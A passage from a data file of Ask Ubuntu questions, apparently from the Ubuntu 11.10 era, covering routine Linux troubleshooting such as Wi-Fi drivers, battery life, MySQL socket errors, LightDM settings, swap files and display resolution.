set-int-prop `` synps/2 synaptics touchpad '' `` two-finger scrolling '' 8 1 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger scrolling '' 8 1 1 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger pressure '' 32 10 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger width '' 32 8 setxkbmap -layout gb xkbset m xkbset exp =m xmodmap -e `` keycode 135 = pointer_button2 ''
92222	why is downloading the kubuntu .iso such a horrible user experience ?	when i go to ubuntu.com , i click `` get ubuntu '' , then i click `` download and install '' , then i select my desired option , ( kubuntu , xubuntu , edubuntu not being options there , sadly ) , then the download begins . possibly one more click than necessary , but not bad . so with no kubuntu option , i go to kubuntu.com which redirects to kubuntu.org , i click `` get kubuntu '' , then i click `` download kubuntu '' , then i select my desired version ... which takes me to `` metrocast.net '' , where the options at the top of the page are all ubuntu , not kubuntu ! so i had to scroll down and click on kubuntu , where once again i have to select the version i want , new page load and i have to select 32 or 64 bit , and finally at long last my download begins . this is just a flat-out wretched user experience for a `` canonical supported '' version of ubuntu .
92225	why does ubuntu change the time when installing ?	i just installed ubuntu 11.10 onto a brand new hard drive with no other drives attached . after the install my system time was 2:45 pm instead of 7:45 am . why the change ?
92228	who designs and controls unity ?	which people are in charge and control over unity ? are those the same people that decide to use it in different versions of ubuntu ? who owns it ? who controls what will be in it ?
92232	dell inspiron n5010 overheating problem	i 've installed ubuntu 11.10 on my dell 5010 . it gets too hot . ( between 85째c and 90째c in idle ) . i searched around and found this question . but the solution does n't worked for me . i think there is a problem with xorg . it takes between 10 % and 20 % of cpu all times . i wonder if it 's normal or not . also there is a process named virtuoso-t sometimes takes 25 % of process , when cpu usage of over 25 % . ( i guess one core is completely consumed by it ) . i always kill the virtuoso-t and do n't know what is that . what should i do now ?
92236	configuring evolution from .evolution and .local/share/evolution folders	i reinstalled ( not upgraded ) my system from natty to ocelot this morning . i had backed up my home , including the ~/ . * folders . i have troubles getting evolution to work . even though i restored the .evolution and .local/share/evolution folders , evolution does not seem to realize that there are already a couple of gigabytes of files in 4 emails account already installed for it . it keeps asking me to create accounts from scratch . i realized later that i could have asked evolution to build me a .tgz before reinstalling , but it 's too late for that now . i got used to the fact that copying files usually just work . does anyone know how i can make evolution see what 's there ?
92242	unable connect to android phone using bluetooth	how do i connect my laptop to my htc wildfire through bluetooth ? the laptop is running xubuntu 11.10 , and i have updated blueman to version 1.23 through their launchpad ppa . the phone is running android version 2.2.1 . i can 'pair ' and 'trust ' the phone , but i can neither 'send files to device ... ' nor 'browse files on device ... ' i am able to connect and browse the phone using my netbook running xubuntu 10.04 and blueman version 1.21 .
92243	logging program use	i 'm trying to find a way of logging what programs other users have been using on the system . i 've checked /var/log but do n't seem to find anything to show which programs have been accessed . i 'm looking at historical use , so a ps , top or free is n't viable . thanks !
92256	battery backup issues on acer timeline 3830tg	i recently bought acer timeline 3830tg for my studies and installed ubuntu 11.10 and currently using gnome-shell . i also have changed by graphics mode from hybrid to integrated mode to increase battery backup . with all this steps i have encountered some more problems . could you please help to fix these issues : fan gives too much loud noise ( does not even stop for single second this did n't happen in windows ) battery backup in windows was 7 hours plus but it hardly shows 3 hours in ubuntu i am not able to control screen brightness from keys provided i had used gparted for partition . in one partition i have not kept single file/folder but then also it shows 34gb used i would be very thankful if someone could help me to solve this problems as soon as possible , especially the battery backup issues .
92257	how can i use my pixma 6150 as scanner ?	i bought a canon pixma mg6150 and i am new at ubuntu . with the drivers from canon i got it running a as a printer , but i have problems using it as scanner . with the canon drivers it runs under gimp with scangear mp . but i want to use xsane or gscan2pdf and in these programs it does n't work . they tell me that no devices are available . can anyone help me ?
92260	can not load cds due to `` end-of-central-directory signature not found '' error	i upgraded from ubuntu 9 to ubuntu 11.04 . i now get the following message when i try to run a cd or load any software . an error occurred while loading the archive archive : /media/cdrom0/install.exe [ /mediacdrom0/install.exe end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes on disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /media/cdrom0/install.exe or /media/cdrom0/install.exe.zip , and can not find /media/cdrom0/install.zip , period
92264	some files not copied when moving an encrypted home to a different partition	i have `` successfully '' moved my encrypted home to a separate partition using the instructions here : how can i move an encrypted home directory to another partition ? however , some files are not being copied over . most notably , i have a directory in my old home that contains the themes i use . this directory and it 's contents are not copied over to the new home and therefore i come up with the default theme . permissions on the directory that was not moved are identical to the other directories in home . another discrepancy is that my dropbox folder came over empty and had to resync itself . my concern is what else might be missing from the copied home . at this point , i 've flipped back to the old home by re-editing /etc/fstab , but i 'd really like to get /home cleanly and completely off of root without having to core the system .
92266	problem linking libunity	i 'm trying to compile a basic c++ app consisting of the following code : # include < unity/unity/unity.h > int main ( ) { return 0 ; } just to try and get the libunity library compiled before i start doing any work on the app . i 'm using qmake to manage the makefile , which is as follows : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # automatically generated by qmake ( 2.01a ) mon jan 2 16:33:26 2012 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # template = app target = unity-lens-test config -= qt unix { config += link_pkgconfig pkgconfig += glib-2.0 pkgconfig += dee-1.0 pkgconfig += libdbusmenu-0.4 } libs += -lunity \ += -lgtest dependpath += . src includepath += . # input sources += src/main.cpp my problem lies with the third pkgconfig directive within the unix { } block , referring to libdbusmenu-0.4 . when i try to run qmake on this file , i get the following error : package libdbusmenu-0.4 was not found in the pkg-config search path . perhaps you should add the directory containing `libdbusmenu-0.4.pc' to the pkg_config_path environment variable no package 'libdbusmenu-0.4 ' found package libdbusmenu-0.4 was not found in the pkg-config search path . perhaps you should add the directory containing `libdbusmenu-0.4.pc' to the pkg_config_path environment variable no package 'libdbusmenu-0.4 ' found package libdbusmenu-0.4 was not found in the pkg-config search path . perhaps you should add the directory containing `libdbusmenu-0.4.pc' to the pkg_config_path environment variable no package 'libdbusmenu-0.4 ' found which is an error i never got when i added the entries for glib-2,0 or dee-1.0 . when i try to compile without this option , the qmake command succeeds but gcc returns the following error : /usr/include/unity/unity/unity.h:15:37 : fatal error : libdbusmenu-glib/client.h : no such file or directory when i search for this file , i find it in /usr/include/libdbusmenu-0.4/libdbusmenu-glib/client.h in which case i would expect pkgconfig += libdbusmenu-0.4 to fix the issue , at least going by my experience with the previous two options . i have all the libunity build dependencies installed so i 'm not sure what else i could possibly have to do to get this to compile . is there something special about libdbusmenu that requires a different approach ? is the problem at my end ? i 've checked out the rocking out with libunity notes but there 's nothing in there regarding compilation . thanks in advance for your help .
92268	`` aptitude update '' as cronjob , customize the cron-mail-output	i have set up aptitude update as cronjob for root and sending the mail to my normal user account . what i want to have now , is that all the output of aptitude is ommited and instead only a summarization of all packages that are new or could be updgraded . also in case of errors , there should be a list of errorous repos/ppa and the corresponding errormessage . is there a way to do such a cronjob , and where can i find informations about scripting such thing ?
92271	is there a way to install packages via a a queue even when there is another instance of an installation or upgrade is running ?	many times there is the problem , that i have only a small bandwith connection , and when running a sudo aptitude safe-upgrade or similar with a big download volume and then stumble upon a program that i want to install additionally via packagemanagement , then i have to remember that myself . even worse when i have to add a ppa ... is there a way to add the ppas and add packages for installation to a queue even when there is another instance of an installation or upgrade is running ? i am using ubuntu 11.10 and i am not bound to aptitude , apt-get or synaptic , but would prefer a cli solution .
92276	how do i boot into true text mode ?	i 've found ways to disable gdm or lightdm or whatever 11.10 uses , but i ca n't find a way to get a true text-mode boot . i want to see all the kernel messages fly by as it boots , not a stupid purple screen . i got the desktop manager turned off finally , but now i get a purple screen for a while , then it switches to tty1 . after that happens , i get about half a screen of kernel messages ( the end of the boot sequence ; stuff about running init scripts etc . ) and the login prompt . i did this by changing grub_cmdline_linux_default and grub_cmdline_linux to `` text '' in /etc/defaults/grub . really my main question is , what is putting that dumb purple screen up at boot , and how do i disable it ! ?
92277	where can i find a ppa for fcron ?	according to https : //launchpad.net/ubuntu/oneiric/+package/fcron it seems that there is a version of fcron available for 11.10 , but reffering to http : //www.ubuntuupdates.org/packages/show/329892 it seems that fcron was removed from the repos . also i cant find it in synaptics . is there an easy way to install fcron side by side with cron via ppa ? if possible i would be happy if i could avoid selfcompiling it .
92280	broadcom 4313 ( gn ) wirelless card on hp pavilion g6 weak signal but close to ap	i installed fresh ubuntu 11.04 and i have wireless connection but i have to be very close to the router to have signal . i looked everywhere i ca n't manage to find a solution . in my grub it says that i have : 3.1.4-030104 generic old ones : 3.0.0-14 generic 3.0.0-12 generic kernels . i tried the solution here but i think this is for older versions of ubuntu . on windows 7 the wireless card is working flawlessly . please help me to find a solution i 'll be grateful .
92281	kmail migration issues in 11.10	i 've only just upgraded my kubuntu to 11.10 . i had heard there were issues with the new kmail2 that uses a different database . details at https : //wiki.kubuntu.org/oneiricocelot/final/kubuntu/kmail2 this also says that the conversion tool that appears when you first run kmail does not work and to use the command line version . i 've done that , but still get the conversion dialog . i see there is a ~/.kde/share/config/kmail-migratorrc file that says it completed . so how do i get it to accept that the data has already migrated ? or has it really ? to be honest i 'm thinking of moving away from kmail as i have had a few issues with it being slow and not well supported . i may move to thunderbird , but i need to make sure i can transfer all my mail folders .
92283	can not modify my usb files/folders	this is my first post here , i hope that you guys can help . i connected my usb on my computer ( ubuntu ) , but i ca n't modify its folders/files . it says that i do n't have enough permission . so i tried changing the mod with the terminal using sudo chmod 777 /media/ < usb name > but it returns that it 's read only . when i put my usb on another os it 's the same ! please help ! i want to be able to modify my usb contents on any os . sorry , i would like to post images , but do n't have enough reputation ... but i can tell that mine is different than yours , it shows a warning sign , but i can see that it said that i might need two softwares : dosfstools and mtools , should i get them ?
92285	are there still 9.10 software sources available ?	i am still using ubuntu karmic . i know i should upgrade but that is not so easy in the moment as i am in a country with very low bandwidth . i need to install one package . can i still find old software sources somewhere ?
92287	intel 3945abg wifi sees only some networks	this is kinda strange . the router is set fine and i can see it from a mac and from 2 mobile phones . is wep protected and not hidden or other tricks , as it comes from the box . my ubuntu is 10.04 on hp pavillion dv1000 . when i try to connect from ubuntu , it does see other networks ( 10 or more ) but not my own . i 've tried restarts , ifconfig up/down , rfkill block/unblock wifi , installing b43-fwcutter and nothing works . i would appreciate any suggestions . thanks $ sudo lshw -c network *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 02 serial : 00:19 : d2:0c : a6 : bf width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:27 memory : d6000000-d6000fff *-network description : ethernet interface product : pro/100 ve network connection vendor : intel corporation physical id : 8 bus info : pci @ 0000:05:08.0 logical name : eth0 version : 02 serial : 00:16:36:4e:9b:60 size : 100mb/s capacity : 100mb/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=full firmware=n/a ip=10.0.0.1 latency=64 link=yes maxlatency=56 mingnt=8 multicast=yes port=mii speed=100mb/s resources : irq:20 memory : d8000000-d8000fff ioport:4000 ( size=64 ) $ sudo iwlist scan lo interface does n't support scanning . eth0 interface does n't support scanning . wlan0 scan completed : cell 01 - address : 00:21:29 : c7:5c:82 channel:6 frequency:2.437 ghz ( channel 6 ) quality=39/70 signal level=-71 dbm encryption key : on essid : '' alveveien227 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000003cfab679b1 extra : last beacon : 1588ms ago ie : unknown : 000c416c7665766569656e323237 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : unknown : 32040c121860 ie : unknown : 2d1a0c181affff000000000000000000000000000000000000000000 ie : unknown : 3d1606001300000000000000000000000000000000000000 ie : unknown : dd930050f204104a00011010440001021041000100103b00010310470010109070c00000109070c0004000000000102100244c696e6b7379732c2041204469766973696f6e206f6620436973636f2053797374656d73102300075752543631304e1024000876312e30302e30301042000234321054000800060050f2040001101100075752543631304e100800020088103c000103 ie : unknown : dd090010180202f0050000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c330c181affff000000000000000000000000000000000000000000 ie : unknown : dd1a00904c3406001300000000000000000000000000000000000000 cell 02 - address : 34:21:09:02 : ff : a0 channel:9 frequency:2.452 ghz ( channel 9 ) quality=22/70 signal level=-88 dbm encryption key : on essid : '' kontoret 2 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : unknown/bug extra : tsf=0000015573e86ed2 extra : last beacon : 1496ms ago ie : unknown : 000a4b6f6e746f7265742032 ie : unknown : 010882848b961224486c ie : unknown : 030109 ie : unknown : 32040c183060 ie : unknown : 33082001020304050607 ie : unknown : 33082105060708090a0b ie : unknown : dd270050f204104a0001101044000102104700102880288028801880a88034210902ffa0103c000101 ie : unknown : 050400030080 ie : unknown : 2a0104 ie : unknown : 2d1aee1117ffff0000010000000000000000000000000c0000000000 ie : unknown : 3d1609070700000000000000000000000000000000000000 ie : unknown : 7f0101 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : 0b0505002d127a ie : unknown : dd1e00904c33ee1117ffff0000010000000000000000000000000c0000000000 ie : unknown : dd1a00904c3409070700000000000000000000000000000000000000 ie : unknown : dd07000c4304000000
92292	what software can i use test the performance of my system ?	i installed ubuntu ( 11.10 64bit ) to my new laptop ( asus a53e-xt4 ) , and would like to test capabilities , especially it 's 6gb 's of ram . is there any software in the software center ( or on the web ) , that can help me do this ? i tried running a couple of applications , but the ram has n't even passed to 3gb mark !
92295	how do i focus an `` urgent '' application ?	sometimes applications will wiggle in the launcher and have a blue triangle . ( see compiz config settings for unity . ) how can i set a keyboard command to bring that application to the front in ubuntu 11.10 ? i had it set in 11.04 , but i do n't remember how . this is useful when programs open in the background or if you activate them from another app . ( i have an alias to send files to a single gvim instance from terminal instead of opening them in their own window . when gvim gets the file , it wiggles but does n't gain focus . )
92297	how do i set the login manager to enable `change languages` at login ?	how can i recompile the source to force the option to allow changing languages and keyboard layouts at login ?
92301	how to save energy ?	i just want to get some advices howto save energy on my new laptop . i already installed a kernel patch . on the picture below you can see , that i got less minutes of time than percentage . only wireless lan and firefox was running , and the display was on the lowest level i 'm able to switch to . i have installed no graphic driver , because the system would break after it . if i 'm using windows i got about 2-3 hours or more to browsing the web , or reading something . some data : model : acer aspire 5750g system : ubuntu 11.10 oneric ocelot x64 kernel : 3.0.0-13.22 mjgaspmfix de : gnome 3 cpu : intel i7 2630qm ( sandy bridge ) gpu : nvidia geforce gt 540m ( optimus )
92310	i have two top panels in ubuntu for some reason	my ubuntu was working fine , then i moved my computer around , and when i brought it back , i now have two top panels like so : the smaller bottom panel still works somewhat , so it is not just a matter of it being drawn twice . it is a further a huge hassel as i can drag , for example , google chrome . why is this happening and how can i fix it ? below , in this second image , you can see that the panel extends all the way down as well , creating a second wallpaper : the output of the command ps -ef | grep -i panel is username 2084 1 0 12:24 ? 00:00:09 /usr/lib/unity/unity-panel-service username 3821 3764 0 14:45 pts/0 00:00:00 grep -- color=auto -i panel here is a list of things i have tried so far : restarting force restarting unity ( by activating/deactivating static application switcher in compiz config utility ) changing desktop background ( you never know ! ) system specs os : ubuntu 11.10 cpu : amd phenom ii x4 965 processor mem : 6 gb gpu : radeon hd 4670
92315	update manager wo n't update , software center will not open	could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'n . ' is not known on line 3 in source list /etc/apt/sources.list.d/pmcenery-ppa-oneiric.list , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . '
92316	monitor color after installation under windows	i have installed the newest ubuntu by wubi , and after then my monitor is not showing the colors correctly . it seems like it were 8 bit instead of 32 . since then i have uninstalled ubuntu , and reinstalled windows ( vista ) but the colors are still wrong . can you please help ?
92317	how to get dell d420 wlan working ?	i have the same problem with my dell d420 and the wlan is not working . jenus @ jenus : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . jenus @ jenus : ~ $ lspci -vnn | grep 14e4 09:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5752 gigabit ethernet pci express [ 14e4:1600 ] ( rev 02 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) subsystem : dell wireless 1390 wlan mini-card [ 1028:0007 ] flags : bus master , fast devsel , latency 0 , irq 17 memory at efdfc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : kernel modules : wl , ssb any idea how can i solve this issue ? ? ?
92318	how can i install ubuntu on an external hard drive so that i can boot it on different computers ?	i need to be able to use ubuntu on different computers with my external hard drive , with varying devices . and it needs to be a full ( normal..ish ) install . ( no bootable+overlayfs persistence for me ! ) i 'll probably be using computers with an i386 architecture , but the 32/64-bit could change . or , i 'll just hope for the best and just repart my drive and install .
92321	why is my volume sometimes not working when i start the computer ?	here is a screenshot of my problem : basically the volume only starts at certain times . i can reboot my machine and sometimes the volume will work , sometimes it wo n't . if i run : alsamixer it shows the volume , i can adjust it . i have no idea why this randomly works , it seems to fall more on the side of not working and is starting to get quite annoying as anytime i try and watching a video on the net it crashes chrome because audio is not working . i 'm starting to really miss the days when ubuntu was less flashy but just worked .
92322	time of execution of daily anacron job	i have set a daily anacron job , which runs form /etc/cron.daily . from the /etc/crontab i see it should run daily at 06:25 ( or at start-up/reboot ) . however when the date changes ( 00:00 ) and the computer is up , i dont want anacron to wait till 06:25 . if the computer is up i would like to it to run the script as soon as the date changes ( 00:00 ) . does it make sense to add a cron job to run anacron @ hourly ? thank you very much
92323	is there an 11.04 package for gtk+-3.2.0 ?	gtk+-3.2.0 has been out since 26-sep-2011 . when will there be a package available for ubuntu natty ? i 've tried building it myself but it 's very difficult , all i get are errors . the references pages are n't very much help there too advanced . i installed the following : sudo apt-get install libffi-dev zlib1g-dev fam libdbus-1-dev libdbus-glib-1-dev gobject-introspection libxext-dev libxrender1-dbg colordiff libcairo2-dev libtiff4-dev libpng12-dev libxft-dev libxi-devel i have the dir /home/me/gtk there i have the folders : atk-2.1.5 gdk-pixbuf-2.24.1 glib-2.30.1 gtk+-3.2.3 pango-1.29.1 then : cd /home/me/gtk/glib-2.30.1 ./configure & & make rm -rf /home/me/gtk/include/glib.h /home/me/gtk/include/gmodule.h ( glib install instructions ) make install repeat for the other folders except without the rm , in the following order : atk-2.1.5 gdk-pixbuf-2.24.1 pango-1.29.1 gtk+-3.2.3 before running ./configure for gtk+-3.2.3 i do : cppflags= '' -i/home/me/gtk/include '' ldflags= '' -l/home/me/gtk/lib '' pkg_config_path= '' /home/me/gtk/lib/pkgconfig '' export cppflags ldflags pkg_config_path ld_library_path= '' /home/me/gtk/lib '' path= '' /home/me/gtk/bin : $ path '' export ld_library_path path export pkg_config_path= '' /home/me/gtk/lib/pkgconfig : $ pkg_config_path '' i get the these errors when i run make on gtk+-3.2.3 : gdkwindow-x11.c : in function '_gdk_x11_moveresize_handle_event ' : gdkwindow-x11.c:4301:9 : error : 'xievent ' undeclared ( first use in this function ) gdkwindow-x11.c:4301:9 : note : each undeclared identifier is reported only once for each function it appears in gdkwindow-x11.c:4301:18 : error : 'ev ' undeclared ( first use in this function ) gdkwindow-x11.c:4301:33 : error : expected expression before ' ) ' token gdkwindow-x11.c:4302:9 : error : 'xideviceevent ' undeclared ( first use in this function ) gdkwindow-x11.c:4302:24 : error : 'xev ' undeclared ( first use in this function ) gdkwindow-x11.c:4302:46 : error : expected expression before ' ) ' token gdkwindow-x11.c:4306:16 : error : 'xi_motion ' undeclared ( first use in this function ) gdkwindow-x11.c:4308:13 : warning : implicit declaration of function '_gdk_x11_device_xi2_translate_state' gdkwindow-x11.c:4313:16 : error : 'xi_buttonrelease ' undeclared ( first use in this function ) make [ 4 ] : *** [ gdkwindow-x11.lo ] error 1 make [ 4 ] : leaving directory `/home/me/gtk/gtk+-3.2.3/gdk/x11' make [ 3 ] : *** [ all-recursive ] error 1 make [ 3 ] : leaving directory `/home/me/gtk/gtk+-3.2.3/gdk' make [ 2 ] : *** [ all ] error 2 make [ 2 ] : leaving directory `/home/me/gtk/gtk+-3.2.3/gdk' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/me/gtk/gtk+-3.2.3' make : *** [ all ] error 2
92325	how to set sound input to the sound that 's coming out of the speakers ?	i remember that i could do this by messing with input devices at the sound configuration menus , but it does n't work anymore . i want to make the default input be a virtual mic that 's the sound that 's coming out of the speakers , while still being able to listen to it .
92326	ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 )	i 've been struggling with this issue for a really long time . can someone please advise me on how to get mysql working ? root @ me : ~ # start mysql start : job is already running : mysql root @ me : ~ # mysql error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) what boggles the mind is that it shows no mysql processes being run even though the above bash says otherwise . ~ # ps -ef | grep mysql root 8968 1631 0 15:24 pts/0 00:00:00 grep -- color=auto mysql
92327	how do i get synergy to work ?	i 've never actually been able to get synergy working , even when using quicksynergy . even using this guide gives me nothing ; my mouse wo n't leave the edge of my screen . i 've even disabled both computers ' ufw firewalls to make sure ports are n't being blocked . what am i doing wrong ? work-macbook , host computer : [ share ] left=work-laptop [ use ] hostname= clientname= [ settings ] synergypath=/usr/bin work-laptop , slave computer : [ use ] hostname=work-macbook clientname=work-macbook [ settings ] synergypath=/usr/bin pinging work-macbook from work-laptop works , and pinging work-laptop from work-macbook works . things are basically working with host-names to ip addresses on my network , so that does n't seem like the issue : pings : work-macbook $ ping work-laptop 64 bytes from work-laptop ( 192.168.1.2 ) work-laptop $ ping work-macbook 64 bytes from work-macbook ( 192.168.1.49 )
92328	how do i uncompress a tarball that uses .xz ?	i 'm used to extracting tarballs with a -xfz flag , which handles gzip and bzip2 archives . recently i 've run into a .tar.xz file and i would like to uncompress it in one step using tar , how can i do that ?
92333	ubuntu haves a different path when access via xrdp session	noob here : i have a problem , when i access my server via ssh , the $ path is correct root @ ks391320 : ~ # echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games but when i open my server via xrdp session and go to the terminal it shows an incorrect path : root @ ks391320 : ~ # echo $ path /bin : /usr/bin : /usr/x11r6/bin : /usr/local/bin screenshot of both : and this creates an issue because when i try to install something using the `` package installer '' it shows this error ( among others ) dpkg : warning : 'ldconfig ' not found in path
92341	how to change the path of a folder to point to one in windows	basically i 'm wanting my ubuntu music folder to direct me to my windows music folder , so that when i click my ubuntu music folder i see the contents of my windows music folder . i 've already got my window partition to mount automatically so that wo n't be an issue . any ideas on how to accomplish this ?
92342	menu disappears when maximizing window from half screen	i often use the feature where i drag my window to the left or right side of the screen to make it fill half the screen . sometimes , when my window is like that , then i click to maximize it , it does n't maximize , but the main menu ( file/edit/etc ... ) and the min/max/close buttons all disappear . it does n't happen every time , i do n't know exactly what triggers it . my browser is like that now as i type this . what causes this , and how do i fix it ( besides restarting the browser ) ? note the location of my cursor .
92343	dual booting windows 7 and ubuntu 11.10	i have partitioned my hard drive the way required to deal with ubuntu , and i was wondering : every website i 've come across says that grub will overwrite the windows boot-loader , so to uninstall ubuntu you need special software . is there any way to install it so that all i have to uninstall ubuntu is delete the partition , and not have to mess with my mbr ? ? ?
92344	ubuntu 11.10 - black screen with blinking cursor on boot	specs : intel atom 270 intel graphics 1gb ram packard bell version of the acer aspire one the netbook in question has had ubuntu reinstalled twice because of this issue . the os would always work fine for a week or two , then missing directory errors would appear ( `` can not find /tmp '' and the like ) eventually leading to the black screen/blinking cursor problem when starting up . the recovery mode will not boot either , but windows 7 on a separate partition is fine . i 've been following the steps from here : http : //askubuntu.com/a/88165 and am stuck on step 2 as ubuntu will not boot . there is a picture here the cursor blinks , so it 's not completely frozen , but no errors have come up . sorry if this has been answered elsewhere , i had a look and they all seemed to be graphical issues or on a previous version . if i 've missed something ( likely , it 's late here ) then could i please have a link . if anyone has any tips then i 'd greatly appreciate them . many thanks . update : have tried this : change quiet to text nomodeset instead and run into the same problem as the picture above . went into grub ( it 's a dual-boot , so grub always starts up ) and tried to start recovery mode and the process has stopped here : 25.609117 init : failed to spawn friendly-recovery post-stop process : unable to execute : input/output error i 'm new to linux , so i ca n't make heads or tails of that , but thank you for your help jiewmeng !
92347	how to install media explorer ?	media explorer is a media center much like xbmc , it is part of meego . the latest version , 0.3 , is only available as source , which one has to build . a ppa exists , providing version 0.2 , yet i do n't want it -- i want the latest one . the documentation lists the steps to build it in 11.04 , but some packages just are n't found . how can i install the latest version of media explorer ?
92349	how do i hide a particular user from the lightdm login screen ?	how do i hide a particular user from the login screen on a default install of 11.10 and higher ? ( ie . using lightdm ) ?
92353	unity ( ubuntu ) option is missing from login menu	after purging and reinstalling nautilus , unity is missing and everything defaults to gnome classic . the unity ( ubuntu ) option at login is even missing . the unity plugin is still ticked in ccsm . if i run unity -- replace the terminal starts unity and i get the dash and unity panel but still have the bottom gnome panel . if i log out and back in everything is back to gnome classic . it seems the only way i can run unity is by running unity -- replace in the terminal . is there a way to get things back to normal without a clean install ?
92363	no desktop showing dell latitude d531	i recently installed ubuntu 11.10 on a dell d531 laptop instead of windows 7 . the install finished and i rebooted the laptop . to install ubuntu 11.10 , i used a cd . when logged in , the screen shows the background only . i 'm now afraid i 've made my laptop into a paperweight .
92364	live cd works , installed does n't -- wrong display resolution	i have an old laptop ( from 2004 ) that i 'm trying to install ubuntu 11.10 on . when i run the live cd , the display works correctly ( 1024x768 ) . after installing , when i boot from the hard drive , the display goes to 640x480 , using only part of the laptop screen . ( nothing is connected to the external vga port . ) not sure if this is relevant : i was unable to install from the live cd ( it would hang ) , but i installed from the 11.10 alt cd . is there some way to get the x settings that the live cd is so successfully using and force the installed os to use it ? running off the live cd : $ xrand -q screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 2048 x 2048 vga1 unknown connection ( normal left inverted right x axis y axis ) 1360x768 59.8 1152x864 60.0 1024x768 60.0 800x600 60.3 640x480 59.9 lvds1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0*+ 60.0 800x600 60.3 56.2 640x480 59.9 running off the hd ( also ubuntu 11.10 ) : $ xrandr -q screen 0 : minimum 320 x 200 , current 640 x 480 , maximum 2048 x 2048 vga1 unknown connection ( normal left inverted right x axis y axis ) 1360x768 59.8 1152x864 60.0 1024x768 60.0 800x600 60.3 640x480 59.9 lvds1 connected 640x480+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 640x480 60.0*+ 59.9 $ cvt 1024 768 # 1024x768 59.92 hz ( cvt 0.79m3 ) hsync : 47.82 khz ; pclk : 63.50 mhz modeline `` 1024x768_60.00 '' 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync $ xrandr -- newmode `` 1024x768_60.00 '' 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync $ xrandr -- addmode lvds1 1024x768_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 149 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 22 current serial number in output stream : 23 $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 82845g/gl [ brookdale-g ] /ge chipset integrated graphics device ( rev 03 ) years ago i had this same issue with ubuntu 6.06 on this laptop . i fixed this by editing xorg.conf and adding horizsync and vertrefresh option to the monitor section . but now there 's no xorg.conf and my attempts so far to create one have failed ( no visible display ) . i know ubuntu can do it because the live cd works . any suggestions ?
92368	ca n't create a swap file	i 've just formatted my laptop with windows 7 and ubuntu . i 've a 250gb drive and i 've split it in 3 partitions : one for windows 7 , one for ubuntu and a shared partition for both windows and ubuntu . i 've format the drive correctly and i 've installed the 2 operating systems . using gparted there are 4 partitions 3 ntfs ( windows 7 , a small partition for windows and the shared one ) and an ext4 partition for ubuntu . i ca n't create a swap file . i follow this tutorial i ca n't figure out what to do . i tried the fallocate comand and nothing happens . terminal shows these : ubuntu @ ubuntu : ~ $ sudo dd if=/dev/zero of=/mnt/512mib.swap bs=1024 count=524288 524288+0 records in 524288+0 records out 536870912 bytes ( 537 mb ) copied , 1.34189 s , 400 mb/s ubuntu @ ubuntu : ~ $ sudo chmod 600 /mnt/512mib.swap ubuntu @ ubuntu : ~ $ sudo mkswap /mnt/512mib.swap setting up swapspace version 1 , size = 524284 kib no label , uuid=fc09b869-8a61-4dde-8e42-ba00397e2abb what i 'm doing wrong ? and how much space should i have to give ? i have 2gb ram thanks in advice and happy new year ! !
